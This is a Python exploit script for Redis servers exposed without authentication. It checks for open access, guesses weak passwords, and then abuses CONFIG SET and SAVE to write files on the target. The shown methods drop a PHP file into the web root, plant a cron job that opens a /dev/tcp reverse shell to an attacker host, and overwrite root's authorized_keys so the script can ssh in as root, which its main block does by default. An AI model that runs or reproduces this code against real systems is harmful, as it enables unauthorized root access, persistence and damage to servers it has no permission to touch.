#! /usr/bin/env python
# _*_ coding:utf-8 _*_
import os
import socket
import subprocess
import sys
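class PAYLOAD(object):
    """Redis unauthenticated-access / weak-password checker plus RDB-write exploit helpers.

    Every exploit method uses the same primitive: ``CONFIG SET dir`` and
    ``CONFIG SET dbfilename`` followed by ``SAVE`` make Redis write its whole
    keyspace (an RDB file) to an attacker-chosen path. Each payload is padded
    with newlines so the consumer of that file (PHP, cron, sshd) tolerates the
    RDB binary that surrounds it.

    Operational caveats the code does NOT handle:
      * ``SAVE`` clobbers the target file (e.g. an existing ``authorized_keys``)
        and leaves ``dir``/``dbfilename`` changed, so the instance keeps
        persisting into that path afterwards unless the operator restores them.
      * Redis must run with write access to the chosen directory and with
        ``CONFIG`` not renamed/disabled; ``rename-command`` defeats this.
      * Only the legacy ``AUTH <password>`` form is tried; Redis 6+ ACL users
        other than ``default`` need ``AUTH <user> <password>``.
    """

    def __init__(self, ip, port, timeout):
        """ip/port: Redis target; timeout: per-connection socket timeout (seconds)."""
        self.ip = ip
        self.port = port
        self.timeout = timeout
        # Candidate passwords for the legacy AUTH form.
        # NOTE(review): 'p@aaw0rd' looks like a typo of 'p@ssw0rd'; kept verbatim.
        self.PASSWORD_DIC = ['redis', 'root', 'oracle', 'password', 'p@aaw0rd', 'abc123!', '123456', 'admin']

    @staticmethod
    def _encode(*args):
        """Encode ``args`` as a RESP multi-bulk command.

        RESP carries arbitrary bytes (newlines, quotes, backslashes) verbatim,
        so payloads need no inline-protocol escaping. ``str`` args are UTF-8
        encoded; anything else is passed through ``bytes()``.
        """
        out = [b"*" + str(len(args)).encode("ascii") + b"\r\n"]
        for arg in args:
            data = arg.encode("utf-8") if isinstance(arg, str) else bytes(arg)
            out.append(b"$" + str(len(data)).encode("ascii") + b"\r\n" + data + b"\r\n")
        return b"".join(out)

    @staticmethod
    def _printable(cmd):
        """Render a command tuple for logging, showing CR/LF as escapes."""
        return " ".join(cmd).replace("\r", "\\r").replace("\n", "\\n")

    def _connect(self):
        """Open a TCP connection to the target with a per-socket timeout.

        Uses a per-socket timeout instead of ``socket.setdefaulttimeout`` so
        the process-wide default is not mutated as a side effect.
        """
        return socket.create_connection((self.ip, int(self.port)), timeout=self.timeout)

    @classmethod
    def _exchange(cls, sock, *cmd):
        """Send one command and return the first reply chunk (<=1024 bytes) as text.

        Only the first chunk is read; that is enough for the status replies
        and for the head of INFO, which is all the callers inspect.
        """
        sock.sendall(cls._encode(*cmd))
        return sock.recv(1024).decode("utf-8", errors="replace")

    def _run_commands(self, commands):
        """Run ``commands`` in order on one connection, echoing request and reply.

        Returns True if every reply was non-error, False at the first reply
        starting with '-' (e.g. -ERR from a renamed CONFIG, an unwritable dir,
        or -NOAUTH). Stopping early avoids a half-applied dir/dbfilename pair.
        """
        with self._connect() as s:
            for cmd in commands:
                print(self._printable(cmd))
                reply = self._exchange(s, *cmd)
                print(reply)
                if reply.startswith("-"):
                    print("aborting: server rejected the command")
                    return False
        return True

    def check(self):
        """Test for unauthenticated access, then for a weak password.

        Returns u"未授权访问" when INFO answers without auth, u"存在弱口令,密码:<pw>"
        when one of PASSWORD_DIC authenticates, None otherwise (including on
        network errors, which are printed rather than raised).
        """
        try:
            with self._connect() as s:
                reply = self._exchange(s, "INFO")
            if "redis_version" in reply:
                return u"未授权访问"
            # "-NOAUTH Authentication required." is the only other reply we act on.
            if "Authentication" not in reply:
                return None
            for pass_ in self.PASSWORD_DIC:
                # Fresh connection per attempt; a failed AUTH leaves the
                # connection unauthenticated but some setups close it.
                with self._connect() as s:
                    reply = self._exchange(s, "AUTH", pass_)
                if "+OK" in reply:
                    return u"存在弱口令,密码:%s" % (pass_)
            return None
        except OSError as e:
            print(e)
            return None

    def upload_phpinfo(self, web_dir='/var/www/html', filename='redis1.php'):
        """Write a phpinfo() stub into ``web_dir/filename`` via CONFIG SET + SAVE.

        The PHP tag is padded with CRLFs so the interpreter skips the RDB
        bytes around it. Returns True if every command was accepted.
        """
        payload = "\r\n\r\n<?php phpinfo();?>\r\n\r\n"
        try:
            return self._run_commands([
                ("config", "set", "dir", web_dir),
                ("config", "set", "dbfilename", filename),
                ("set", "x", payload),
                ("save",),
            ])
        except OSError as e:
            print(e)
            return False

    def recerive_tcp(self, rhost, rport, cron_dir='/var/spool/cron', cron_file='root'):
        """Drop a crontab line spawning a reverse shell to rhost:rport.

        The original note said this method did not work; the cron line was
        written without the newline padding the ssh method uses, so it is
        padded here like the other payloads (TODO confirm against a target).
        Distributions differ on the spool path (Debian/Ubuntu use
        /var/spool/cron/crontabs) and on how strictly cron parses the file,
        hence ``cron_dir`` is a parameter. Returns True if every command was
        accepted; the shell only appears once cron runs the job.
        """
        job = "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/{}/{} 0>&1\n\n".format(rhost, rport)
        try:
            return self._run_commands([
                ("config", "set", "dir", cron_dir),
                ("config", "set", "dbfilename", cron_file),
                ("set", "xxx", job),
                ("save",),
            ])
        except OSError as e:
            print(e)
            return False

    def ssh_connect(self, local_key_dir='/root/.ssh', remote_ssh_dir='/root/.ssh'):
        """Plant an SSH public key in the target's authorized_keys and ssh in as root.

        Generates an RSA keypair under ``local_key_dir`` (ssh-keygen still
        prompts for a passphrase), stores the padded public key in Redis, and
        makes SAVE write it to ``remote_ssh_dir/authorized_keys``. The key is
        sent over the same socket the other methods use, so ``redis-cli`` is
        no longer required and no shell command is built from ``ip``/``port``.
        WARNING: SAVE overwrites any existing authorized_keys on the target.
        Returns True if the key was written and ssh was launched.
        """
        key_path = os.path.join(local_key_dir, "id_rsa")
        try:
            # -f pins the output path so it matches the file read below
            # regardless of ssh-keygen's default (~/.ssh, i.e. only /root/.ssh as root).
            subprocess.run(["ssh-keygen", "-t", "rsa", "-f", key_path], check=True)
            with open(key_path + ".pub", "r") as f:
                pubkey = f.read()
            # Newline padding isolates the key line from the RDB bytes around it.
            padded = "\n\n" + pubkey + "\n\n"
            ok = self._run_commands([
                ("set", "authorized_keys", padded),
                ("config", "set", "dir", remote_ssh_dir),
                ("config", "set", "dbfilename", "authorized_keys"),
                ("save",),
            ])
            if not ok:
                return False
            # Interactive session; the private key path matches the one generated above.
            subprocess.run(["ssh", "-i", key_path, "root@{}".format(self.ip)])
            return True
        except (OSError, subprocess.CalledProcessError) as e:
            print(e)
            return False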
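if __name__ == '__main__':
    # Usage: python redis_exploit.py <ip> <port>
    if len(sys.argv) != 3:
        sys.exit("usage: {} <ip> <port>".format(sys.argv[0]))
    ip = sys.argv[1]
    port = sys.argv[2]
    p = PAYLOAD(ip, port, timeout=20)
    # NOTE: this runs the most intrusive method directly -- it overwrites the
    # target's /root/.ssh/authorized_keys via SAVE and leaves dir/dbfilename
    # changed. Run p.check() first if you only want to confirm exposure.
    p.ssh_connect()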
redis未授权漏洞利用脚本